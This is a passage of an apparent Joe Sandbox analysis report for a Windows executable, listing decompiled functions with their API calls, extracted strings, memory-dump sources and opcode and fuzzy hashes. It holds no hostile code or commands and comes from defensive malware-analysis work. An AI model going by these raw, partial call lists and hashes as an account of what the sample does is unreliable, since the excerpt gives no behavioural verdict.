                                                                                                                                                                                                                                    • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009B04BE
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009B04CC
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009B04DA
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009B0505
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009B0510
                                                                                                                                                                                                                                  • ___scrt_fastfail.LIBCMT ref: 009B0457
                                                                                                                                                                                                                                    • Part of subcall function 009B0413: __onexit.LIBCMT ref: 009B0419
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • InitializeConditionVariable, xrefs: 009B04B8
                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 009B04C4
                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009B0492
                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 009B04D2
                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 009B04A3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                  • Opcode ID: bd208e18f29552aecbff149b29ebe9bba9d2471583f0f0f13ab28a600ea1fb46
                                                                                                                                                                                                                                  • Instruction ID: 2c91876aface1d165d1d6c7186b2e6417b946d4d1b596ae028d13fbafb1ec18d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd208e18f29552aecbff149b29ebe9bba9d2471583f0f0f13ab28a600ea1fb46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3021CC32A447147BD7309BE8AD06BEB37E9FBC4BB1F140525F90597691DBB498028950
                                                                                                                                                                                                                                  Function 009F3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                  • Opcode ID: 62aa3d28e0c3aff0a9969f773daa9a06c023e29e644dd21c24ce02d4dd8e82fb
                                                                                                                                                                                                                                  • Instruction ID: f0947998836bf7b77f20b09d4ee42c5d472c08db88d2a3a20dfb8ae64440f4f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62aa3d28e0c3aff0a9969f773daa9a06c023e29e644dd21c24ce02d4dd8e82fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE1E532A0051AABCF149FB8C8517FDFBB8BF54710F50C119EA56E7250DB38AE499790
                                                                                                                                                                                                                                  Function 00A04F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00A2DCD0), ref: 00A04F6C
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A04F80
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A04FDE
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A05039
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A05084
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A050EC
                                                                                                                                                                                                                                    • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A57C10,00000061), ref: 00A05188
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                  • Opcode ID: 5ee6598a406206ddb4152db2a174094fa19f0397e78c10c63c0e56e6e0be4505
                                                                                                                                                                                                                                  • Instruction ID: a4e167816a5eabb6140155867df33bd78f5d19fc6556bab832e31828120a3008
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee6598a406206ddb4152db2a174094fa19f0397e78c10c63c0e56e6e0be4505
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2B1BF71A087069FC710EF38E990AAFB7E5BFA4724F50491DF596872D2DB30D844CA92
                                                                                                                                                                                                                                  Function 00A1BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BBF8
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC10
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC34
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BC60
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC74
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A1BC96
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BD92
                                                                                                                                                                                                                                    • Part of subcall function 00A00F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A00F6D
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BDAB
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1BDC6
                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A1BE16
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00A1BE67
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A1BE99
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BEAA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BEBC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1BECE
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A1BF43
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2178637699-0
                                                                                                                                                                                                                                  • Opcode ID: 93d7309ba8edee233950b5a8e17d299ccbdfbaa705ab403cd1251aa12e25cd27
                                                                                                                                                                                                                                  • Instruction ID: 78893ce9cdb1401b15744b3bae44d4e0402c084e188a0d78af4b58b00a7edbe3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93d7309ba8edee233950b5a8e17d299ccbdfbaa705ab403cd1251aa12e25cd27
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F19E715183009FCB14EF28C991BABBBE5BF85310F14855DF4859B2A2DB31EC85CBA2
                                                                                                                                                                                                                                  Function 00A14A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A2DCD0), ref: 00A14B18
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A14B2A
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00A2DCD0), ref: 00A14B4F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00A2DCD0), ref: 00A14B9B
                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028,?,00A2DCD0), ref: 00A14C05
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000009), ref: 00A14CBF
                                                                                                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A14D25
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00A14D4F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 354098117-199464113
                                                                                                                                                                                                                                  • Opcode ID: 1ebc25391707388dbdddccda9d6437802e3c9f1290f01b17f0348fd23576e2ee
                                                                                                                                                                                                                                  • Instruction ID: 8bcf027ddece86a8ccfcae97e2908d9eb0b089ab57d5b6f5f0fd806c63923ddc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ebc25391707388dbdddccda9d6437802e3c9f1290f01b17f0348fd23576e2ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65121B75A00115EFDB14DF98C884EEABBB5FF49714F248098F909AB251D731ED86CBA0
                                                                                                                                                                                                                                  Function 0099381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00A629C0), ref: 009D3F72
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00A629C0), ref: 009D4022
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 009D4066
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 009D406F
                                                                                                                                                                                                                                  • TrackPopupMenuEx.USER32(00A629C0,00000000,?,00000000,00000000,00000000), ref: 009D4082
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009D408E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                  • Opcode ID: 2dbc367761854d81b76bf533e3c68df2e32db0bee913cb1c71168b5958981755
                                                                                                                                                                                                                                  • Instruction ID: 573a5b05454cab80e1a66dedb230cb7296c41893bd0848f7d3c0d8cb7c331d56
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dbc367761854d81b76bf533e3c68df2e32db0bee913cb1c71168b5958981755
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8271F570A84209BBFB218F6DDC49FAABF68FF44368F10C216F614A62D1C7B19910CB51
                                                                                                                                                                                                                                  Function 00A27711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00A27823
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A27897
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A278B9
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A278CC
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00A278ED
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00990000,00000000), ref: 00A2791C
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A27935
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00A2794E
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00A27955
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A2796D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A27985
                                                                                                                                                                                                                                    • Part of subcall function 00992234: GetWindowLongW.USER32(?,000000EB), ref: 00992242
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                  • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                  • Opcode ID: 38e8574536b1061698b417a5c4ad8f9e75467f94e2868ff8b174f533cd538e06
                                                                                                                                                                                                                                  • Instruction ID: f0e7a7da9244c0d0d221a5b559d2241c4ad06b28405757720a993ddc78a769c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38e8574536b1061698b417a5c4ad8f9e75467f94e2868ff8b174f533cd538e06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10716571109344AFD725CF5CDC48B6ABBF9FB89304F04046EF98587261C7B4AA86CB12
                                                                                                                                                                                                                                  Function 00A29B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00A29BA3
                                                                                                                                                                                                                                    • Part of subcall function 00A280AE: ClientToScreen.USER32(?,?), ref: 00A280D4
                                                                                                                                                                                                                                    • Part of subcall function 00A280AE: GetWindowRect.USER32(?,?), ref: 00A2814A
                                                                                                                                                                                                                                    • Part of subcall function 00A280AE: PtInRect.USER32(?,?,?), ref: 00A2815A
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00A29C0C
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A29C17
                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A29C3A
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A29C81
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00A29C9A
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00A29CB1
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00A29CD3
                                                                                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 00A29CDA
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00A29DCD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                  • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                  • Opcode ID: 7a483246a1a7c2f9a515bda764bed86185f01483dc32ca4ae85488da06464886
                                                                                                                                                                                                                                  • Instruction ID: 8b1d53e1ad86ca859915dfb5144b26306f07ff09640bad05344cd2c4dda4dff1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a483246a1a7c2f9a515bda764bed86185f01483dc32ca4ae85488da06464886
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF614671108301AFC701EF58DC85EABBBF8EFC8750F40092DF595921A1DB70AA4ACB52
                                                                                                                                                                                                                                  Function 00A28FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00A266D6,?,?), ref: 00A28FEE
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A28FFE
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29009
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29016
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29024
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29033
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A2903C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29043
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A266D6,?,?,00000000,?), ref: 00A29054
                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A30C04,?), ref: 00A2906D
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A2907D
                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A2909D
                                                                                                                                                                                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00A290CD
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A290F5
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A2910B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                                                                                                                  • Opcode ID: b4ba97702c0499eea80d520d40d98a3acaf7d74020d3a624d79e1c76535ef24a
                                                                                                                                                                                                                                  • Instruction ID: 7d529f1f32d0bf1037cfd1fa7faa5f41e8e5dfb6f373850c588849385eeb35b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4ba97702c0499eea80d520d40d98a3acaf7d74020d3a624d79e1c76535ef24a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C410875600218EFDB21DFA9DC48EAB7BB8EB89B15F104068F905D7261D7709942DB60
                                                                                                                                                                                                                                  Function 00A1C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C154
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C1D2
